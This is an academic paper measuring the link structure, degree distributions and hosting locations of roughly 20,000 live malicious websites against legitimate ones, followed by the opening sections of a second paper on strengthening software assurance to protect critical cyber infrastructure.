Disclaimer: Parts of this paper were prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor any agency thereof, nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise does not necessarily constitute or imply its endorsement, recommendation, or favoring by the United States Government or any agency thereof. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof.



Link Analysis and Link Visualization of Malicious Websites

Manoj Cherukuri and Srinivas Mukkamala

(ICASA)/(CAaNES)/New Mexico Institute of Mining and Technology, USA

manoj@cs.nmt.edu

srinivas@cs.nmt.edu

Abstract: In this paper we present web crawling, meta-searches, geolocation tools, and computational intelligence techniques to assess the characteristics of a cyber-incident and determine whether an incident is likely to be caused by a certain group, the geographical location of the source, the intent of the attack, and useful behavioral aspects of the attack. The malicious websites extracted from the identified sources acted as seeds for our crawler and were crawled up to two hops, traversing through all the hyperlinks emerging from these pages. After crawling, all the websites were translated to their geographic locations based on the location of the server on which the website is hosted, using Internet Protocol (IP) address to geographical location mapping databases. We applied social networking analysis techniques to the link structure of the malicious websites to put forward the properties of the malicious websites and compared them with those of the legitimate websites. We identified the potential sources or websites that publish malicious websites using the meta-searches. Our approach revealed that the behavior of the malicious websites with respect to their indegrees, outdegrees and clustering coefficient differs from that of the legitimate websites, and that some malicious websites acted as promoters for other malicious websites. The link visualization showed that the links traversing across the malicious websites are not confined to the region where the website was hosted.

Keywords: link analysis, link visualization, malicious websites, social networking analysis techniques

1. Introduction

The increase in the number of internet users and in bandwidth has resulted in a proliferation of websites. World Internet Usage and Population Statistics (2010) stated that, as of June 2010, there are about 2 billion internet users throughout the world, with a growth rate of about 440% over a decade. The December 2009 Web Server Survey (2009) affirmed that there are about 240 million websites hosted all over the world. The prospective growth rate of internet users and their huge number created a new means of making revenue for attackers, people who contribute to the malicious activities on the web. This huge market being exploited by the attackers is often referred to as the Underground Economy. Cheng (2008) reported that, as of 2008, the market for the underground economy was about US$276 million, with a potential of billions of dollars. Luvender (2010) stated that, as of April 2010, the United States alone is facing a loss of about $200 billion per year.

A malicious website is a website which hosts malicious code to attack the client’s machine or spoofs the client by building up a look-alike. The malicious script on the webpage is executed on loading the webpage, and a malicious script or file is installed without the user’s consent by exploiting the vulnerability of an application or by other possible means. The installed program reports the user’s sensitive data to the attacker. The underground economy has its own organizational hierarchy, with different sets of people (based on their roles) working collaboratively to exploit its potential. Important roles contributing to the hierarchy of the underground economies suggested by Zhuge et al. (2007) are Virus Writers, Website Masters, Envelope Stealers, Virtual Asset Stealers and Virtual Asset Sellers. Virus writers are responsible for writing the malicious code. Website masters build up the websites and attract traffic to their hosted websites using approaches like search engine optimization, blogging, spam etc. The terms website masters and traffic sellers are used interchangeably in this document. Envelope stealers purchase the malicious code and web traffic from the virus writers and website masters respectively. Envelope stealers capture the raw data from the victim’s machine and sell it to the virtual asset stealers. Virtual asset stealers extract the useful information from the raw data purchased to convert it into a virtual asset, and sell the virtual assets to the virtual asset sellers. Virtual asset sellers sell the virtual assets to the clients based on the type of the asset.

Figure 1, obtained from the Google Online Security blog, shows an increase in the number of malicious websites (Provos, 2010). The increase in the number of users of the internet has made the web a promising means for spreading malware. The exponential growth of the websites on the World Wide Web has made traditional crawling an infeasible option for detecting the malicious websites. The crawling mechanism must be associated with intelligence to get an optimal detection rate, often referred to as intelligent crawling. Previous work has shown that some of the hosting companies are acting as a safe medium for hosting the malicious websites (Kalafut, Shue and Gupta, 2010), and has used code-based and host-based features for the detection of malicious websites dynamically (Ma et al., 2009; Cova, Kruegel and Vigna, 2010). In this paper we present a few interesting heuristics of these malicious websites that help in enhancing the detection rate of the malicious websites.

Figure 1: Growth of the number of entries on the Google Safe Browsing Malware List

This paper is organized as follows: in section 2, we discuss the technical terms that help in understanding our results. In section 3, we discuss the processes involved in our study. In section 4, we describe our dataset. In section 5, we discuss the analysis of the dataset. In section 6, we discuss the link visualization. In section 7, we conclude with the results.

2. Related technical terms

2.1 Indegree

Indegree of a node is defined as the number of edges pointing towards a node. For example, the indegree of node A in Figure 2 is 3 since there are three edges from nodes B, C, D pointing towards node A.

Figure 2: Graph demonstrating node A with indegree 3

2.2 Outdegree

Outdegree of a node is defined as the number of edges pointing out from a node. For example, the outdegree of node A in Figure 3 is 3 since there are three edges emerging from A pointing towards nodes B, C, D.

Figure 3: Graph demonstrating node A with outdegree 3
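The two degree measures defined above can be computed directly from an edge list. A minimal sketch (the edge lists reproduce the examples of Figures 2 and 3; the function name is ours):

```python
from collections import defaultdict

def degrees(edges):
    """Indegree and outdegree per node from a list of directed (src, dst) edges."""
    indeg, outdeg = defaultdict(int), defaultdict(int)
    for src, dst in edges:
        outdeg[src] += 1  # edge leaves src
        indeg[dst] += 1   # edge arrives at dst
    return indeg, outdeg

# Figure 2: edges from B, C, D point towards A  -> indegree of A is 3
indeg, _ = degrees([("B", "A"), ("C", "A"), ("D", "A")])

# Figure 3: edges from A point towards B, C, D  -> outdegree of A is 3
_, outdeg = degrees([("A", "B"), ("A", "C"), ("A", "D")])
```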

2.3 Clustering coefficient

Clustering coefficient is the measure of the degree of closeness among the nodes of a graph (Clustering Coefficient, 2010). Chakrabarti and Faloutsos (2006) stated that the clustering coefficient represents the clumpiness of the graph. The clustering coefficient of a node is computed as the ratio of the number of links among the linked nodes of a node to the number of possible links among the linked nodes of that node. The clustering coefficient of nodes with 0 or 1 neighbors is 0.

The clustering coefficients of all the nodes are computed and averaged to get the clustering coefficient of the network. For example, consider the graph shown in Figure 4.

Node A has three neighbors, namely B, C and D. BC is the only link among the neighbors of A. The number of possible links among the neighbors of A is 3 (i.e. 3C2). Therefore, the clustering coefficient of A is 0.33.

Node B has two neighbors and there is one link among the neighbors of B. Therefore, the clustering coefficient of B is 1.

Node C has two neighbors and there is one link among the neighbors of C. Therefore, the clustering coefficient of C is 1.

Node D has two neighbors and there is no link among the neighbors of D. Therefore, the clustering coefficient of D is 0.

Node E has only one neighbor. Therefore, the clustering coefficient of E is 0.

Figure 4: Graph used for explaining clustering coefficient

The clustering coefficient of a graph is computed using the following formula,

C = (1/n) Σ Ci

where C represents the clustering coefficient of the graph, Ci represents the clustering coefficient of the node i and n is the total number of nodes in the graph (Clustering Coefficient, 2010). The clustering coefficient of the graph in the figure above is 0.466 (i.e. (1/5)(0.33+1+1+0+0)).
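The worked example above can be reproduced with a short routine over an adjacency structure. A self-contained sketch (the adjacency dictionary encodes the undirected graph of Figure 4; the function names are ours):

```python
from itertools import combinations

def node_clustering(adj, node):
    """Links among a node's neighbours divided by the possible links among them;
    nodes with 0 or 1 neighbours get coefficient 0 by convention."""
    nbrs = adj[node]
    if len(nbrs) < 2:
        return 0.0
    possible = len(nbrs) * (len(nbrs) - 1) / 2
    actual = sum(1 for u, v in combinations(sorted(nbrs), 2) if v in adj[u])
    return actual / possible

def graph_clustering(adj):
    """Average of the node coefficients over all n nodes: C = (1/n) * sum(Ci)."""
    return sum(node_clustering(adj, n) for n in adj) / len(adj)

# Undirected graph of Figure 4: edges A-B, A-C, A-D, B-C, D-E
adj = {
    "A": {"B", "C", "D"},
    "B": {"A", "C"},
    "C": {"A", "B"},
    "D": {"A", "E"},
    "E": {"D"},
}
```

Running `graph_clustering(adj)` recovers the value computed in the text, (1/5)(1/3 + 1 + 1 + 0 + 0) ≈ 0.466.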

3. Processes

Construction of our dataset is composed of three processes:

The first process deals with the collection of malicious websites from multiple sources.

The second process deals with the construction of the link structure for the malicious domains obtained in the previous process.

The third process deals with computing the geographical location of the websites based on the IP address to geographical location mapping.

3.1 Collection of malicious websites

The process of collecting the malicious websites is initialized by identifying the potential sources using the meta-search engines. These sources publish the websites with different sets of associated attributes. Some of the attributes associated with these domains are date, type of attack, executable name and IP address. A custom parser was used for each website source to retrieve the domain name and the IP address if available. All the malicious websites collected from these sources are stored in the database.

3.2 Construction of link structure for malicious websites

Crawling is performed on the malicious websites obtained from the previous process using a custom program. The malicious websites are crawled up to the second hop. The flowchart for the process of building the link structure is shown in Figure 6. All the malicious domains retrieved from the various sources are loaded and act as the seeds for the crawling process, with ‘n’ being the total number of malicious websites. A custom crawler was built to retrieve the content of the malicious websites and parse all the anchor tags from the content. The parsing of the anchor tags from the website content is done using BeautifulSoup (Beautiful Soup, 2010), a widely used HTML parser. All the links originating from the respective malicious websites are stored in the database. The domain is parsed from each such link and is stored in the tuple corresponding to that link. If the link URL is not listed in the malicious websites then it is added to a list called LinkWebsites, avoiding duplicate URLs. Once all the malicious domains are crawled and their corresponding links are stored, the LinkWebsites list is loaded into the MaliciousWebsites list to crawl all the new websites obtained in the first hop from the malicious websites. Again the process of crawling, parsing anchor tags and storing the links is performed. Thus, all the links within the first two hops emerging from the malicious websites are obtained.
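The anchor-tag parsing step can be sketched as below. This is a simplified stand-in, not the actual crawler: it uses Python's built-in html.parser in place of BeautifulSoup so the sketch is self-contained, and the fetching, storage and hop bookkeeping are omitted. The page content and domain names are hypothetical:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class AnchorParser(HTMLParser):
    """Collects the href value of every anchor tag on a page."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def outgoing_domains(html):
    """Parse a page and return the set of domains its links point to."""
    parser = AnchorParser()
    parser.feed(html)
    return {urlparse(link).netloc for link in parser.links if urlparse(link).netloc}

# Hypothetical page content with two outgoing links
page = ('<a href="http://promo.example.org/offer">ad</a>'
        '<a href="http://evil.example.com/drop.exe">download</a>')
```

Each crawled page yields a set of destination domains, which is exactly the per-page record the link structure is built from.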

3.3 Computing geographical location of websites

The location of the server on which a website is hosted was determined using IP address to geographic location mapping. All the distinct domains that are stored during the link analysis phase are translated to their corresponding IP addresses using the Domain Name Servers (DNS). A custom script is used to perform the domain name to IP address translation using the ‘nslookup’ command. The IP address to location mapping is done using an open-source database. All the IP addresses for which the location is not identified are mapped to latitude and longitude values 0 and 0 respectively.
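A hedged sketch of this translation step: socket.gethostbyname stands in for the nslookup call, and the geo_db dictionary stands in for the open-source IP-to-location database; both names and the sample addresses are illustrative only:

```python
import socket

def resolve_ip(domain):
    """Domain name -> IP address, the role played by `nslookup` in the script."""
    try:
        return socket.gethostbyname(domain)
    except socket.gaierror:
        return None  # unresolvable domain

def locate(ip, geo_db):
    """IP -> (latitude, longitude); unidentified IPs map to (0, 0)."""
    if ip is None:
        return (0.0, 0.0)
    return geo_db.get(ip, (0.0, 0.0))

# Hypothetical mapping database with a single known address
geo_db = {"198.51.100.7": (40.71, -74.01)}
```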

4. Dataset

For our experiments, all the potential sources for the malicious websites were identified using the meta-search engines. The identified sources used for the study were PhishTank, Malware Domain Blocklist, abuse.ch, MalwarePatrol, joewein.de LLC. and Malware Domain List.

Figure 5: Flowchart for the process of malicious websites collection.

All the malicious websites listed in these sources were collected and stored in the database. Crawling was performed on the collected malicious websites up to the second hop as described in section 3.2 to build the link structure for all the malicious websites.

Finally, the domains obtained during the first two processes of the data collection were translated to their geographical locations using the process described in section 3.3. To perform a comparative analysis of the malicious websites against the legitimate websites, the top 1500 websites were downloaded from Alexa (Top Sites, 2010), a source for top websites, and were crawled up to the second hop. This set is referred to as the legitimate or non-malicious websites in the remainder of this paper.

Around 350,000 distinct malicious websites were collected from the previously mentioned sources. Since these domains were detected and flagged as malicious, a major portion of them was down at the time of the analysis. Only about 20,000 distinct URLs, about 5.7% of the malicious websites collected, were alive at the time of our analysis. Link analysis was performed on about 19,000 of the 20,000 live malicious websites. The remaining websites did not have any text on which to perform link analysis, as they pointed to files like executables, jars, binaries etc.

Around 600,000 Uniform Resource Locators (URLs) were crawled during the collection of our dataset. The URLs were crawled at a rate of 50 URLs per minute. Of the live malicious websites, 14,970 domains were hosted in the United States. The top five countries contributed 83% of the total malicious websites in our dataset.

Figure 6: Process of construction of link structure up to two hops originating from malicious websites

Figure 7: Overview of the process for the construction of the dataset

Table 1: Top five countries by the number of malicious websites hosted in our dataset

Country Number of malicious websites
United States 14790
Philippines 1086
Canada 432
Germany 183
United Kingdom 143

5. Link analysis

5.1 Outdegree and indegree of malicious websites

The indegree and the outdegree of the malicious websites within the dataset were computed, and two graphs were plotted representing the count of the malicious domains versus the indegree and the outdegree. For computing the indegree and the outdegree of the websites, we considered only the links among different domains, as most of the links within the same domain were identified to be navigational links. The count versus indegree and outdegree graphs are shown in Figure 8. The outdegree and the indegree of the malicious websites did not satisfy the power law, in contrast to the World Wide Web graph (Watts and Strogatz, 1998).

In an attempt to identify an equation that suits the indegrees and outdegrees of malicious websites, we identified that the malicious websites satisfy the power law with an exponential cutoff. The Lambda and Gamma values of the power law with exponential cutoff equation for the indegree and the outdegree of malicious websites were identified to be 12.32, 0.9 and 8.32, 1.02 respectively. The correlation coefficient was measured to verify the fit of these equations. The correlation coefficient was 0.98 and 0.99 for the indegree and the outdegree respectively, signifying a good fit.

f(x) = C · x^(−γ) · e^(−x/λ)

where e^(−x/λ) is the exponential cutoff term and x^(−γ) is the power law term (Clustering Coefficient, 2010).
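Assuming the fitted curve takes the standard form f(x) = C·x^(−γ)·e^(−x/λ) with C a free scale factor (an assumption on our part; the paper reports only the λ and γ values), the reported indegree parameters can be evaluated as follows:

```python
import math

def power_law_cutoff(x, gamma, lam, c=1.0):
    """f(x) = c * x**(-gamma) * exp(-x / lam): a power law damped by an
    exponential cutoff for large x."""
    return c * x ** (-gamma) * math.exp(-x / lam)

# Reported indegree parameters: lambda = 12.32, gamma = 0.9
indegree_fit = [power_law_cutoff(k, gamma=0.9, lam=12.32) for k in range(1, 11)]
```

Both factors decrease with x, so the fitted curve is strictly decreasing, with the exponential term dominating once x grows past the cutoff scale λ.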

Figure 8: Count of malicious websites versus indegree (left) and outdegree on the log-log scale (right)

The average indegree of the malicious websites was 4.1 and the average outdegree was 3.9. The standard deviations of the indegree and the outdegree of the malicious websites were 9.3 and 6.04 respectively. The average indegree was greater than the average outdegree of the malicious websites, even though the indegree computation is limited to the crawled dataset. This indicates that the malicious websites tend to have a higher indegree than outdegree. Series1 represents count versus indegree and count versus outdegree in the left and the right graphs respectively. The outdegree of the malicious websites was compared to the outdegree of the legitimate websites. We avoided the indegree in this comparison as the indegrees are limited to the links existing within the dataset. The graph plotted with the outdegrees of the malicious and the legitimate websites is shown in Figure 9.

Figure 9: Count of malicious websites versus outdegree on the log-log scale for the malicious and the non-malicious websites

The average outdegree of the malicious websites was 3.9 with a standard deviation of 6.04. The average outdegree of the non-malicious websites was 39.17 with a standard deviation of 30.64. The standard deviation of the non-malicious websites was very high compared to that of the malicious websites. The standard deviations of the outdegrees of the malicious and the non-malicious websites about their means signify that the major portion of the non-malicious websites have an outdegree greater than 10 and the major portion of the malicious websites have an outdegree less than 10. The spike in the series of malicious websites at the outdegree of 89 was due to a cluster of websites (about 35 websites) which had links to each other randomly.

5.2 Malicious websites linked through a non-malicious website

For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of edges. All the distinct domains obtained during the construction of the link structure were considered as the vertices of graph G. Based on the links obtained during the construction of the link structure, the vertices were connected with directional edges.

All the malicious websites that were part of the link structure were loaded into a set S. In order to identify the non-malicious websites facilitating malicious websites, all the vertices which were not in S and had a minimum of one edge pointing towards them from a vertex in S and a minimum of one edge emerging from them towards another vertex in S were selected.
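The selection criterion above can be sketched as a single pass over the edge list. The function name, edge list and domain labels are illustrative, not the study's actual code:

```python
def facilitating_sites(edges, malicious):
    """Vertices outside the malicious set S with at least one incoming edge
    from S and at least one outgoing edge back into S."""
    has_in_from_s, has_out_to_s = set(), set()
    for src, dst in edges:
        if src in malicious and dst not in malicious:
            has_in_from_s.add(dst)   # edge from S points towards this vertex
        if dst in malicious and src not in malicious:
            has_out_to_s.add(src)    # edge from this vertex points into S
    return has_in_from_s & has_out_to_s

# Hypothetical link structure: f is reached from m1 and links on to m2
edges = [("m1", "f"), ("f", "m2"), ("m1", "x"), ("y", "m2")]
```

In this toy graph only `f` satisfies both conditions: `x` is pointed to by S but has no edge back into it, and `y` links into S but receives no edge from it.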

In this analysis, we tried to identify the domains which were not malicious but had links to malicious websites. In our study of link analysis, it was observed that around 5000 malicious websites were linked through 950 non-malicious websites.

In order to make the study effective, some of these non-malicious domains were visited manually to get a better knowledge of how the links to malicious domains were being placed in the non-malicious domains. The main reason for this sort of linking is that the traffic sellers have built up websites with high pagerank that drive traffic towards the malicious websites, which are short-lived, and according to Stevens (2010), the traffic sellers are paid based on the number of clicks or number of victims.

As most of the traffic towards the non-popular domains is obtained through search engines, the traffic sellers are using these non-malicious domains as the means of driving traffic towards the newly built malicious websites. The distribution of the outdegrees of the facilitating websites is shown in Figure 10. Figures 11, 12 and 13 show screenshots of websites promoting malicious websites in different ways.

Figure 10: Number of facilitating websites against their respective outdegrees on the log-log scale

The mean outdegree of the facilitating websites was identified to be 50.12 with a standard deviation of 30.13. The mean outdegree of the facilitating websites is high compared to the mean outdegrees of the malicious and the legitimate websites. The facilitating websites have high outdegrees, mimicking the behavior of the legitimate websites in contrast to that of the malicious websites.

Figure 11: Screenshot of the website beautfulwallpapers.com

The website in Figure 11 is non-malicious but has links to other malicious websites in the top left corner (marked in box), deceiving users into believing that all of them belong to the same website.

Figure 12: Screenshot of the website bizar.com

The website in Figure 12 is non-malicious but promotes links to malicious websites with relevant content at the bottom of the page (marked in box).

The website in Figure 13 is not malicious but has links to other malicious websites in the right column (marked in box) under the heading “TRY MORE”. The similarity of the products in the right column to the product of the main website draws the user’s attention towards them.

5.3 Malicious websites linked to other malicious websites<br />

For this analysis, a graph G(V, E) was constructed, where V is the set of vertices and E is the set of edges. All the malicious websites that participated in the construction of the link structure were considered as the vertices of graph G. Based on the links obtained during the construction of the link structure, the vertices were connected with directed edges. In order to identify the malicious websites linked to other malicious websites, all the vertices with an edge to another vertex were selected.
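The selection step described above can be sketched as follows; the edge set and domain names are hypothetical, not taken from the study's data.

```python
# Illustrative sketch of the selection step: build a directed edge set over the
# crawled websites and keep every malicious vertex that links to another
# malicious vertex. Domains are hypothetical.
edges = {
    ("mal-a.example", "mal-b.example"),
    ("mal-b.example", "mal-c.example"),
    ("mal-d.example", "clean.example"),  # target outside the malicious set
}
malicious = {"mal-a.example", "mal-b.example", "mal-c.example", "mal-d.example"}

linked_to_malicious = sorted(
    {src for (src, dst) in edges if src in malicious and dst in malicious}
)
print(linked_to_malicious)
```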

Figure 13: Screenshot of cddvdcopy.net

In our link analysis, it was observed that around 1000 malicious websites were linked directly to another malicious website. Manual analysis was done on these sites to better understand the linking mechanism. The reason for such links might be that many malicious domains are under the control of a single envelope stealer trying to host multiple types of attacks on different domains; in such a case, the envelope stealers would prefer to have links among the malicious domains under their control. The domains encountered in this category were fewer than in the previous category. The main reason might be that envelope stealers restrict their traffic sellers, as the victims become common among the different envelope stealers. However, reaching a conclusion on this point would require a detailed analysis of the coding style and the type of attack used, which is out of scope for this study. Figures 14, 15 and 16 show screenshots of examples of malicious websites in this category.




Figure 14: Screenshot of the website legalizationofmarijuana.com

Figure 15: Screenshot of the website howtogrowmarijuanablog.com

Figures 14, 15 and 16 are screenshots of malicious websites linking to other malicious websites. All three sites are malicious and have links to each other under the links section in the left column of the page (marked with a box).

5.4 Clustering coefficient of malicious websites

The clustering coefficient was computed among the malicious websites to measure the closeness among them, and was compared with the clustering coefficient of the legitimate websites to understand the differences in the linking mechanism. The clustering coefficient of the malicious websites was identified to be 0.18, and a significant portion of this value is contributed by the facilitating websites. On the other hand, the clustering coefficient of the legitimate websites was identified to be 0.59, more than three times that of the malicious websites. This shows that links among the malicious websites are few.
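The clustering coefficient referred to here is the one defined by Watts and Strogatz (1998); a minimal sketch of the computation on a toy undirected graph follows (the study applied it to the website link graph).

```python
# Minimal sketch of the average local clustering coefficient
# (Watts & Strogatz, 1998): for each vertex, the fraction of possible edges
# among its neighbours that actually exist, averaged over all vertices.
# The graph below is a toy example.
graph = {
    "a": {"b", "c"},
    "b": {"a", "c"},
    "c": {"a", "b", "d"},
    "d": {"c"},
}

def local_clustering(g, v):
    neighbours = g[v]
    k = len(neighbours)
    if k < 2:
        return 0.0  # undefined for degree < 2; treated as zero here
    links = sum(1 for u in neighbours for w in neighbours if u < w and w in g[u])
    return 2.0 * links / (k * (k - 1))

avg = sum(local_clustering(graph, v) for v in graph) / len(graph)
print(round(avg, 4))
```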




Figure 16: Screenshot of the website medicalmarijuanablog.com

6. Link visualization

Links were visualized on Google Maps using the Google Maps application programming interface (API). The pre-computed geographic locations of the websites, obtained from an IP-address-to-location database, were used to plot them on the map. Link visualization provides an interactive means for analyzing the patterns followed by the links among different websites. The interactive map supports zooming and displays the name of a website when its marker is clicked.

In Figure 17, the malicious websites and the facilitating websites are marked with red and blue markers respectively. The red lines represent bidirectional links, the green lines represent incoming links with respect to the facilitating website, and the blue lines represent outgoing links with respect to the facilitating website. The lines going out at one extreme of the map are connected through the other extreme. From these images it is evident that the links traverse malicious domains across different countries, showing that the attackers are not limiting the hosting of their malicious websites to a single hosting service or country.

In Figure 18, the red lines represent bidirectional links and the green lines represent unidirectional links. In Figure 19, selecting a domain depicts on the map all the links associated with malicious domains. The green line represents an incoming link with respect to the selected domain, the red line represents a bidirectional link, and the blue line represents an outgoing link with respect to the selected domain.

7. Conclusion

In this work we presented some interesting heuristics of malicious websites that help in enhancing the mechanisms used for the detection of malicious websites.

We identified the behavior of the malicious websites with respect to their indegrees and outdegrees, and defined an equation that fits the indegree and outdegree distributions of the malicious websites, which followed a power law with exponential cutoff.

We compared the outdegree of the malicious websites with that of the legitimate websites and concluded that malicious websites tend to have a low outdegree compared to legitimate websites.

We computed the clustering coefficient of the malicious websites, compared it to that of the legitimate websites, and showed that linking among the malicious websites is low compared to that among the legitimate websites.

Our analysis showed that the attackers are using legitimate websites with high Google PageRank as a means of directing traffic towards the malicious websites.




We presented a new way of visualizing the links on a map using their geographical locations, and showed that the attackers are not limiting the hosting of their malicious websites to a single country or hosting service but are spread all over the world.

Figure 17: Visualization of malicious websites connected through the facilitating websites

Figure 18: Visualization of malicious domains linked to other malicious domains




Figure 19: Customized link visualization with domains listed in the left pane

8. Future work

We plan to perform similarity analysis among different malicious websites to identify clusters of malicious sites under one control. This will help in understanding the behavior and characteristics of groups of attackers. We also plan to extend this study using content analysis of the malicious webpages.

Acknowledgements

We would like to thank our data sources: PhishTank, Malware Domain Blocklist, MalwarePatrol, Malware Domain List, joewein.de LLC and abuse.ch.

References

“Beautiful Soup.” (2010), Crummy [Online], 09 Apr, Available: http://www.crummy.com/software/BeautifulSoup [01 Jun 2010].
Chakrabarti, D. and Faloutsos, C. (2006) “Graph Mining: Laws, Generators and Algorithms”, ACM Computing Surveys, Vol 38, No 1.
Cheng, J. (2008) “Symantec: Underground Cybercrime Economy Booming”, Ars Technica [Online], 25 Nov, Available: http://arstechnica.com/security/news/2008/11/symantec-underground-cybercrime-economybooming.ars [10 Aug 2010].
“Clustering Coefficient.” (2010), Wikipedia [Online], 29 Jul, Available: http://en.wikipedia.org/wiki/Clustering_coefficient#Global_clustering_coefficient [07 Aug 2010].
Cova, M., Kruegel, C. and Vigna, G. (2010) “Detection and Analysis of Drive-by Download Attacks and Malicious JavaScript Code”, WWW 2010 - 19th International World Wide Web Conference, North Carolina (USA).
“December 2009 Web Server Survey.” (2009), Netcraft [Online], 24 Dec, Available: http://news.netcraft.com/archives/2009/12/24/december_2009_web_server_survey.html [10 Aug 2010].
Kalafut, A.J., Shue, C.A. and Gupta, M. (2010) “Malicious Hubs: Detecting Abnormally Malicious Autonomous Systems”, IEEE Infocom Mini-Conference, California (USA).
Luvender, R.V. (2010) “Fraud Trends in 2010: Top Threats from a Growing Underground Economy”, A First Data White Paper.
Ma, J., Saul, L.K., Savage, S. and Voelker, G.M. (2009) “Beyond Blacklists: Learning to Detect Malicious Web Sites from Suspicious URLs”, Knowledge Discovery and Data Mining, Paris.
Provos, N. (2010) “Malware Statistics Update”, Google Online Security Blog [Online], 25 Aug, Available: http://googleonlinesecurity.blogspot.com/2009/08/malware-statistics-update.html [10 Aug 2010].
Stevens, K. (2010) “The Underground Economy of the Pay-Per-Install Business”, Black Hat Technical Security Conference, Las Vegas (USA).
“Top Sites.” (2010), Alexa Internet Inc. [Online], 10 Jul, Available: http://www.alexa.com/topsites [10 Jul 2010].
Watts, D.J. and Strogatz, S.H. (1998) “Collective dynamics of ‘small-world’ networks”, Nature, Vol 393, pp 440-443.
“World Internet Usage and Population Statistics.” (2010), www.internetworldstats.com [Online], Available: http://www.internetworldstats.com/stats.htm [10 Aug 2010].
Zhuge, J., Holz, T., Song, C., Guo, J., Han, X. and Zou, W. (2007) “Studying Malicious Websites and the Underground Economy on the Chinese Web”, Workshop on Economics of Information Security, Pennsylvania (USA).



The Strategies for Critical Cyber Infrastructure (CCI) Protection by Enhancing Software Assurance

Mecealus Cronkrite, John Szydlik and Joon Park
Syracuse University, USA
micronkr@syr.edu
jaszydli@syr.edu
jspark@syr.edu

Abstract: Modern organizations are becoming more reliant on complex, interdependent, integrated information systems. Key national industries constitute the critical infrastructure (CI) and include telecommunications, energy, healthcare, agriculture, and transportation. These CI industries are becoming more dependent on a critical cyber infrastructure (CCI) of computer information systems and networks, which are vital to the continuity of the economy. Organized attackers are increasing in number and power, with ever more powerful computing resources that increasingly threaten CCI software systems. The motivations for attacks range from terrorism and fraud to identity theft, espionage, and political activism. Government and industry research has found that most cyber attacks exploit known vulnerabilities and common software programming errors. Software vendors have been unable to agree on or implement a secure coding standard, and the non-technical consumer is too ill-informed to demand secure, high-quality products. These conditions perpetuate preventable risk. As a result, software vendors do not implement security unless it is specifically required by the customer, leaving many systems full of gaps. Since most exploited vulnerabilities are preventable, the implementation of a minimum level of software quality is one of the key countermeasures for protecting the critical information infrastructure. Government and industry can improve the resilience of the CI in an increasingly interdependent network of information systems by protecting the CCI with stronger software assurance practices and policies and by strengthening product liability laws and fines for non-compliance. In this paper we discuss the increasing software and market risks to the CCI and address strategies to protect the CCI through enhanced software assurance practices and policies.

Keywords: critical cyber infrastructure, secure programming quality, software assurance

1. Introduction

The first major Internet attack, by the Morris worm in 1988, was a bad prank gone awry, but it made clear, for the first time, that cyber security threats could escape physical boundaries. Cyber threats could now spread rapidly through the Internet and impact different organizations and countries simultaneously. In 2001, Code Red and Nimda were the first attacks to disrupt the commercial internet, affecting many business and ecommerce sites (Gelbstien & Kamal, 2002). Next, the 2003 SQL Slammer worm caused major disruption of commercial and banking systems; the attack exploited a weakness for which a patch already existed but had not been applied across enough of the consumer base, and the resulting internet slowdown caused damage to other companies. In 2003, the Sobig virus temporarily shut down 23,000 miles of a railway system, arguably the first successful CI attack (McGuinn, 2004). However, the 2010 Stuxnet SCADA attack was undoubtedly the first of its kind to disrupt CI operations. Its entry point was ultimately attributable to a hard-coded SQL administrative password (Falliere, et. al. 2010), a well-known bad development practice. In the twenty-two years since Morris, cyber security incidents have grown in frequency and impact.

Over the past ten years especially, the number of successful CCI attacks has been increasing. The profile of the creators of malware programs has changed since the days of the Morris worm. Today malware is developed and used primarily by criminal actors for financial gain, and potentially by other actors seeking to cause market instability and economic damage.

In the past, computing attacks required access to high-end computing, which was limited to well-funded, established entities that could support large data centres and computer clusters. However, the introduction of the botnet has created a black market for spam sending, large-scale brute-force cracking and decryption activities, and Distributed Denial of Service (DDoS) attacks for hire at very cheap prices scaled according to the target size (OECD, 2008).

A “botnet” is a criminal network of distributed computing, created by compromising victim devices, usually through malware that exploits existing software weaknesses, and enslaving them as “zombies” in the larger criminal computer network. As the computing power of non-secured internet-connected devices increases, so does the collective computing power of botnets. It is typical to see botnets with over ten thousand nodes or hosts at their command (US-CERT, 2005). Very large botnets such as Conficker or Mariposa controlled millions of nodes.

Botnets can also run any distributed application criminals can imagine; these are “criminal clouds”, already active and operational years ahead of industry. These rogue ad-hoc botnets have greatly strengthened the computing arsenal of non-state criminal and terrorist organizations (Council of Europe Counterterrorism Task Force, 2007). Motivated attackers now have access to cheap, large-scale “stolen” computing grids. As a result, the baseline security presumptions associated with securing or encrypting data and securing the data’s availability over the internet have greatly weakened.

2. Background

2.1 The relationship between the CI and the CCI

Figure 1: CCI IS stack by security control and influence

The US Department of Homeland Security Presidential Directive-7 (HSPD-7) defines the critical infrastructure (CI) by the importance of an industry to society and the economy, e.g. transportation, agriculture, energy, healthcare, telecommunications, and emergency services. The critical cyber infrastructure (CCI) comprises the information systems that support the operation of these key needs. DHS’ National Cyber Command Division (NCCD) is responsible for protecting the CCI in the US, and focuses on helping the CI industries “conduct vulnerability assessments, develop training, and educate the control systems community on cyber risks and mitigation solutions.” (McGurk Testimony, 2010)

We can layer the components that intersect in a malware attack by their ability to control or influence security processes, as in Figure 1. Developer knowledge and skill are the final arbiters of code quality, with the software publisher’s development methodology supervising those decisions. Therefore, the ability to control and change security behaviour depends on the quality practices of the software publisher and its developers (Wang, et. al, 2008). The responsibility for software security rests with the company that publishes the code and the developers who participated in the system's development, because their knowledge of the system exceeds that of other spheres of influence.

2.2 The increasing risk to Critical Cyber Infrastructure (CCI)

Losses attributable to coding defects or weak configuration have increased in all industry sectors. The impact of cyber attacks grows as dependence on CCI systems designed with poor practices continues. Until the 2010 Stuxnet attack, critical infrastructure systems were ‘siloed’, or separated from possible internet damage. Stuxnet thwarted this final defence and achieved an attack through a series of weaknesses in software practices (Falliere, et. al. 2010).

